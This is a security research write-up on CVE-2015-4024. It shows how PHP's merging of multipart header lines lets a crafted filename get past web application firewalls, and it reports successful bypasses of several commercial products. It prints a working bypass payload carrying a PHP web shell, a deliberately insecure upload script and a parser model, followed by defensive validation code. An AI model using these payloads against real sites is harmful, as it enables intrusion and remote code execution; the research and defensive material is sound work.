A new use for the PHP DoS vulnerability: CVE-2015-4024 revisited

Source: Internet
Author: User
Tags cloudflare


0x01 How the WAF is bypassed
Recall the mechanism of the PHP DoS vulnerability: when multipart_buffer_headers parses the value of a part header, that value may span n lines. Every line that begins with a blank character, or that contains no ':' character, is treated as a continuation of the previous header and triggers the merge code block below. Parsing an n-line value therefore runs the merge block n-1 times, and each run allocates a fresh buffer and copies the whole accumulated value again, which is what produced the DoS.
prev_len = strlen(prev_entry->value);
cur_len = strlen(line);

entry.value = emalloc(prev_len + cur_len + 1);        /* one allocation per merge */
memcpy(entry.value, prev_entry->value, prev_len);     /* copies the whole accumulated value again */
memcpy(entry.value + prev_len, line, cur_len);        /* then appends the new line */
entry.value[cur_len + prev_len] = '\0';

entry.key = estrdup(prev_entry->key);

zend_llist_remove_tail(header);                       /* frees the previous value */
The official PHP fix removes the repeated copy on each merge and with it the DoS, but it does not change the merging itself, and that behaviour is the key to the WAF bypass: when multipart_buffer_headers parses a header value that spans several lines, each line that begins with a blank character or contains no ':' is appended to the previous header's value. A WAF that parses the upload filename without honouring this protocol compatibility, that is, one that reads the Content-Disposition line on its own and never merges the following lines, sees a different filename from the one PHP ends up with.
So if the filename continues on a new line with sf/shell.php, PHP merges the lines and, because '/' is the directory separator, reduces the name to its basename: the uploaded file is stored as shell.php. The bypass payload, the test script for the upload function, and the result follow.
WAF bypass payload (the \n stands for a literal line break inside the request body, so sf/shell.php reaches PHP as a separate header line; note that the double quote opened before test3.jpg is never closed):
------WebKitFormBoundaryx7V4AhipWn8ig52y
Content-Disposition: form-data; name="file"; filename="test3.jpg\nsf/shell.php
Content-Type: application/octet-stream

<?php eval($_GET['C']); ?>
------WebKitFormBoundaryx7V4AhipWn8ig52y
Script used to test the file upload function (deliberately naive: it stores the file under the name the client supplied and prints that name and its length):
<?php
$name = $_FILES['file']['name'];
echo $name;
echo "\n";
// PHP has already reduced the merged filename to its basename here
move_uploaded_file($_FILES['file']['tmp_name'], '/usr/local/nginx/html/upload/' . $_FILES['file']['name']);
echo "upload success! " . $_FILES['file']['name'];
echo "\n";
echo strlen($_FILES['file']['name']);
?>
The payload is uploaded successfully.
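To make the parser difference concrete, here is an added example (not code from the article and not PHP's own source) that models in Python how multipart_buffer_headers merges continuation lines and how php_ap_getword_conf and php_ap_basename then reduce the filename, beside a naive WAF that reads the Content-Disposition line in isolation. It goes slightly beyond the payload above: it covers both the double-quote and single-quote openers that PHP accepts, and it also counts the bytes the pre-fix merge loop copies, which is where the DoS came from. The boundary, the function names and the constructed request part are assumptions made for the example.

```python
import re

BOUNDARY = "----WebKitFormBoundaryx7V4AhipWn8ig52y"   # assumed, as in the article's payload


def build_part(filename_param: str, content: str) -> str:
    """Constructed multipart part. filename_param is spliced in verbatim, so it may
    carry the CRLF that turns the rest of the name into a continuation line."""
    return (f"--{BOUNDARY}\r\n"
            f'Content-Disposition: form-data; name="file"; filename={filename_param}\r\n'
            "Content-Type: application/octet-stream\r\n"
            "\r\n"
            f"{content}\r\n"
            f"--{BOUNDARY}--\r\n")


def php_part_headers(part: str) -> dict:
    """Model of multipart_buffer_headers() in main/rfc1867.c: a line that starts
    with whitespace or has no ':' is appended to the previous header's value
    (the line terminator itself is dropped, as get_line() strips it)."""
    header_block = part.split("\r\n\r\n", 1)[0]
    headers = []                                   # ordered [key, value] pairs
    for line in header_block.split("\r\n")[1:]:    # [0] is the boundary line
        if line and not line[0].isspace() and ":" in line:
            key, value = line.split(":", 1)
            headers.append([key.strip().lower(), value.lstrip()])
        elif headers:
            headers[-1][1] += line                 # continuation: merged into previous value
    return dict(headers)


def php_getword_conf(s: str) -> str:
    """Model of php_ap_getword_conf(): a value opened with " or ' extends to the
    matching quote, or to the end of the (merged) header value if it never closes;
    an unquoted value ends at whitespace or ';'."""
    s = s.lstrip()
    if s[:1] in ('"', "'"):
        end = s.find(s[0], 1)
        return s[1:] if end < 0 else s[1:end]
    return re.split(r"[\s;]", s, maxsplit=1)[0]


def php_upload_filename(part: str) -> str:
    """What PHP stores in $_FILES['file']['name']: the filename= parameter of the
    merged Content-Disposition, reduced to its basename the way php_ap_basename()
    does (everything up to the last '/' or '\\' is discarded)."""
    cd = php_part_headers(part).get("content-disposition", "")
    idx = cd.find("filename=")
    if idx < 0:
        return ""
    raw = php_getword_conf(cd[idx + len("filename="):])
    return re.split(r"[/\\]", raw)[-1]


def naive_waf_filename(part: str) -> str:
    """A WAF that matches the Content-Disposition line on its own: it reads the
    filename up to the end of that line and never sees the continuation line."""
    for line in part.split("\r\n"):
        m = re.search(r"""filename=["']?([^"'\r\n]*)""", line)
        if m:
            return m.group(1)
    return ""


def prefix_copy_cost(n_lines: int, line_len: int) -> int:
    """Bytes memcpy'd by the pre-fix merge loop when a header value of line_len
    bytes is followed by n_lines continuation lines of line_len bytes each: the
    whole accumulated value is copied again on every merge, so the total grows
    quadratically in n_lines (the CVE-2015-4024 DoS)."""
    total, prev_len = 0, line_len
    for _ in range(n_lines):
        total += prev_len + line_len      # the two memcpy() calls of one merge
        prev_len += line_len
    return total


if __name__ == "__main__":
    shell = "<?php eval($_GET['C']); ?>"           # the article's web shell, as part content
    for param in ('"test3.jpg\r\nsf/shell.php', "'test3.jpg\r\nsf/shell.php", '"test3.jpg"'):
        part = build_part(param, shell)
        print(f"{param!r:32} PHP sees {php_upload_filename(part)!r:12} WAF sees {naive_waf_filename(part)!r}")
    print("bytes copied for 10000 continuation lines of 100 bytes:", prefix_copy_cost(10000, 100))
```

For the two bypass parts the model reports that PHP stores shell.php while the line-oriented WAF matches test3.jpg; for the well-formed part both agree. The copy counter makes the DoS visible in numbers: doubling the number of continuation lines roughly quadruples the bytes copied.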

0x02 Bypassing WAFs in practice
The author set up a test site, placed it behind 360 Website Guard and Jiasule in turn, and verified that the method bypasses each product's file-upload protection.
2.1 Bypassing 360 Website Guard
Step 1: confirm that the site is protected by 360 Website Guard and that a request uploading a PHP file directly is blocked.

Step 2: 360 Website Guard is bypassed and the shell is uploaded as apo.php. Whether or not the request carries a Content-Type header makes no difference to the bypass.

2.2 Bypassing Knownsec Jiasule
Step 1: confirm that the site is protected by Jiasule and that a request uploading a PHP file directly is blocked.

Step 2: Jiasule is bypassed and the shell is uploaded as syt.php.

2.3 Bypassing Baidu Cloud Acceleration
The Baidu Cloud Acceleration block page shows that CloudFlare technology is in use, so the product is presumably a joint Baidu and CloudFlare offering. No dedicated Baidu Cloud Acceleration test environment was set up; instead a site already behind Baidu Cloud Acceleration was used for the test.
Step 1: confirm that the site is protected by Baidu Cloud Acceleration and that a request uploading a PHP file directly is blocked.

Step 2: Baidu Cloud Acceleration is bypassed.

2.4 Safedog test
The same method was tried against the file-upload protection of Safedog (安全狗) with the following part headers:
Content-Disposition: form-data; name="file"; filename="2.php
aa:
Content-Type: image/jpeg
Between 2.php and aa there is a %0a (a line break), and the Apache process handling the request crashed outright. This looks like it could be an overflow, but it was not investigated further.
2.5 CloudFlare test
To test whether the international CloudFlare service could be bypassed we purchased a plan. With every rule enabled it did not block the file upload at all.


2.6 Amazon WAF
Amazon WAF ships with no rules; every rule has to be configured by the user, and the configuration options include nothing for file uploads, so there is nothing to bypass. The gap between domestic (Chinese) WAFs and those abroad is considerable; why they are designed so differently is worth pondering.

Other WAFs were bypassed as well but are not listed here.
0x03 Extensions and further work
3.1 Other characters in the filename
Likewise, the bypass works not only with a double quote but also with a single quote, since PHP accepts either character as the opening quote of the filename value:
------WebKitFormBoundaryx7V4AhipWn8ig52y
Content-Disposition: form-data; name="file"; filename='test3.jpg\nsf/shell.php
Content-Type: application/octet-stream

<?php eval($_GET['C']); ?>
------WebKitFormBoundaryx7V4AhipWn8ig52y
3.2 Other server-side languages
JSP parsing also has quirks of its own that can be used to bypass WAFs. Other common web languages such as ASP, ASP.NET (aspx) and Python have not been tested yet.
0x04 Solutions
4.1 Solution 1
When parsing a file-upload request, reject any request that does not conform to the multipart protocol specification. This can cause false positives, so the scope of the collateral blocking must be evaluated first.
4.2 Solution 2
Parse the filename the way PHP does: merge continuation lines first, and when the value begins with a single or double quote, read until the matching single or double quote closes it, so that the WAF sees the same filename PHP will store.
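Solution 1 in code, as an added example that is not part of the original article: a strict validator a WAF could run over each multipart part before its filename rules, rejecting the malformed headers that PHP would silently repair (a continuation line, an unclosed quote in the parameter list). Solution 2, reproducing PHP's merge-and-quote semantics inside the WAF, is the alternative and is not shown here. The function names, the blocked-extension list and the sample parts are assumptions.

```python
import re

TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"                    # RFC 7230 tchar
HEADER_LINE = re.compile(r"^" + TOKEN + r":[^\r\n]*$")     # exactly one 'name: value' per line
QUOTED = r'"(?:[^"\\\x00-\x1f]|\\[^\x00-\x1f])*"'          # closed quote, no control chars
BARE = r"[^;\"'\s\x00-\x1f]+"                              # unquoted token, no stray quotes
CD_FORMAT = re.compile(r"^form-data(?:\s*;\s*[\w-]+=(?:" + QUOTED + "|" + BARE + r"))*\s*$",
                       re.IGNORECASE)
FILENAME = re.compile(r'(?:^|;)\s*filename=(?:"((?:[^"\\]|\\.)*)"|([^;\s]+))', re.IGNORECASE)


def _header_lines(part: str) -> list:
    """Lines of the part's header block, boundary line first."""
    return part.split("\r\n\r\n", 1)[0].split("\r\n")


def validate_part_headers(part: str) -> tuple:
    """Return (ok, reason) for one multipart part (boundary line included).
    Rejects what a lenient backend parser would reassemble differently from a
    line-by-line reader: a header line that starts with whitespace or has no ':'
    (PHP appends it to the previous value), and a Content-Disposition whose
    parameters are not all well-formed name=token or name="quoted" pairs (an
    unclosed quote makes PHP swallow the rest of the merged value)."""
    lines = _header_lines(part)
    if not lines[0].startswith("--"):
        return False, "part does not start with a boundary line"
    cd = None
    for line in lines[1:]:
        if not HEADER_LINE.match(line):
            return False, "malformed header line: " + repr(line)
        name, value = line.split(":", 1)
        if name.lower() == "content-disposition":
            cd = value.strip()
    if cd is None:
        return False, "missing Content-Disposition"
    if not CD_FORMAT.match(cd):
        return False, "Content-Disposition parameters not well-formed: " + repr(cd)
    return True, "ok"


def upload_allowed(part: str, blocked_exts=(".php", ".phtml", ".php5", ".jsp")) -> bool:
    """The WAF's upload gate: strict validation first, then the usual extension
    check on the basename. The simple extraction regex is only trustworthy once
    validation has guaranteed a well-formed, single-line parameter list."""
    ok, _ = validate_part_headers(part)
    if not ok:
        return False
    cd = next(l.split(":", 1)[1].strip() for l in _header_lines(part)[1:]
              if l.lower().startswith("content-disposition:"))
    m = FILENAME.search(cd)
    if not m:
        return True                                  # not a file part
    raw = m.group(1) if m.group(1) is not None else m.group(2)
    name = re.split(r"[/\\]", raw)[-1]               # basename, as the backend will store it
    return not name.lower().endswith(blocked_exts)


if __name__ == "__main__":
    # Constructed sample parts: a benign one, the article's payload, and the Safedog crash case.
    samples = {
        "benign": '--b\r\nContent-Disposition: form-data; name="file"; filename="photo;1.jpg"\r\n'
                  'Content-Type: image/jpeg\r\n\r\nJFIF\r\n',
        "bypass": '--b\r\nContent-Disposition: form-data; name="file"; filename="test3.jpg\r\n'
                  'sf/shell.php\r\nContent-Type: application/octet-stream\r\n\r\n'
                  "<?php eval($_GET['C']); ?>\r\n",
        "crash": '--b\r\nContent-Disposition: form-data; name="file"; filename="2.php\r\naa:\r\n'
                 'Content-Type: image/jpeg\r\n\r\nx\r\n',
    }
    for label, part in samples.items():
        print(label, validate_part_headers(part), "allowed:", upload_allowed(part))
```

The quoted-value rule deliberately permits ';' and spaces inside a closed quote, so a legitimate filename="photo;1.jpg" passes; the false positives this strict mode does produce come from clients that emit genuinely malformed headers, which is the impact the article says must be evaluated.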
0x05 Summary
This article revisits the PHP remote DoS vulnerability (CVE-2015-4024) and uses the header-merging behaviour behind it to bypass the file-upload protection of existing WAFs and upload a web shell. The more important value is a new idea and research direction for WAF bypass: exploiting the differences between how the back-end application runtime and the WAF interpret the same request. In general, a good WAF must cope with the parsing differences among web application containers, the protocol standards, and web servers.

 

 
